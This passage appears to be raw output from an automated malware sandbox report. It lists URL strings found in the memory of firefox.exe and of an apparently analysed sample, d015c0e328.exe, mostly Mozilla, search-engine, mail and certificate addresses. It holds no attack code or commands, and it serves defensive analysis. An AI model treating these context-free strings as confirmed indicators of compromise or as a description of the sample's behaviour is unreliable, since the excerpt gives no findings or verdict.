Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gr
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatePREF_APP_UPDATE_NOTIFYDURINGDOWNLOAD
Source: firefox.exe, 00000019.00000002.3010933529.00000209AB403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2881957900.00000209A7C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000003.2726569286.00000209AA199000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2961463851.00000209AA199000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulApplication
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulExpected
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulMozElements.MozElementMixin/parseXULToF
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/browser-data-s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/autoco
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000019.00000002.2961463851.00000209AA15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2726569286.00000209AA15C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulj
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/firefox-view-tabs-s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: firefox.exe, 00000019.00000002.2961463851.00000209AA15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2726569286.00000209AA15C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulw
Source: firefox.exe, 0000001C.00000003.2715655447.000001CC762FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: d015c0e328.exe, 00000007.00000003.2510831156.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2645209357.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2749789372.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2908707750.00000209A8690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000019.00000003.2629667399.00000209A7D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2629038791.00000209A7D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2870035026.00000209A5F00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2629472889.00000209A7D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2629282682.00000209A7D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/Invalid
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000019.00000002.3014477171.00000209AB761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000019.00000002.3014477171.00000209AB77B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2946956724.00000209A9FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2961463851.00000209AA103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2891470046.00000209A82F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpsessionstore.closedTabsFromClosedWindows
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000019.00000002.2916177272.00000209A896C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2928881374.00000209A8F52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000019.00000002.2928881374.00000209A8F52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: d015c0e328.exe, 00000007.00000003.2512194830.00000000059F1000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2648546416.0000000005D31000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2754496805.0000000000546000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: d015c0e328.exe, 00000016.00000003.2754496805.0000000000546000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000019.00000002.2940971557.00000209A9603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180resource://gre/modules/InlineSpellChecker.sys.mj
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000019.00000002.2934623344.00000209A92B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000019.00000002.2934623344.00000209A92B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: d015c0e328.exe, 00000007.00000003.2512194830.00000000059F1000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2648546416.0000000005D31000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2754496805.0000000000546000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: d015c0e328.exe, 00000016.00000003.2754496805.0000000000546000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2804534100.00000209A34AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000019.00000002.2878134580.00000209A7AC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2722286629.00000209B035C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2712404213.00000209AFF73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFEAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsUsi
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000019.00000002.2944125123.00000209A9E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2712404213.00000209AFF73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2629282682.00000209A7D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2881957900.00000209A7C4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: d015c0e328.exe, 00000007.00000003.2456238673.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2456369862.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2582916048.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583248555.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683766739.0000000005398000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2682542124.00000000053AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.inte
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHand
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sbrowser.download.viewableInternally.enabledTypes
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000019.00000002.2870979086.00000209A5F90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
